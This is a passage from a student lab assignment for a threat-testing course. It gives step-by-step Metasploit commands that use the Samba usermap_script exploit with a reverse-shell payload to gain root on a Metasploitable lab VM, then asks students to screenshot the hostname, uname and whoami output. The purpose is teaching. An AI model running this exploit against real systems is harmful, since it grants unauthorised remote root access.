6.
Copy “exploit/multi/samba/usermap_script” and run this command “use exploit/multi/samba/usermap_script”
7.
Next, run the command “show payloads”
8.
After listing the payloads, run the “set payload cmd/unix/reverse” command
9.
Now we must set the remote hosts (Metasploitable VM IP address) and its 445 port. We must also set the local host using the Kali VM IP address.
10. Run “exploit” once targets are set
11. Students must now provide screenshots as evidence that they have obtained root access from the Kali VM to the Metasplotibale VM.
a.
Students must provide the hostname
i.
Run the “hostname” command
b.
Students must provide the server version of the hacked VM
i.
Run the “uname -a” command
c.
Students must provide whoami information
i.
Run the “whoami” command
12. Copy the screenshots into a Word document and save it with your first name_last_name_Threat Protection & Testing_Week 1_Lab1.
13. Upload the document to FSO for a grade.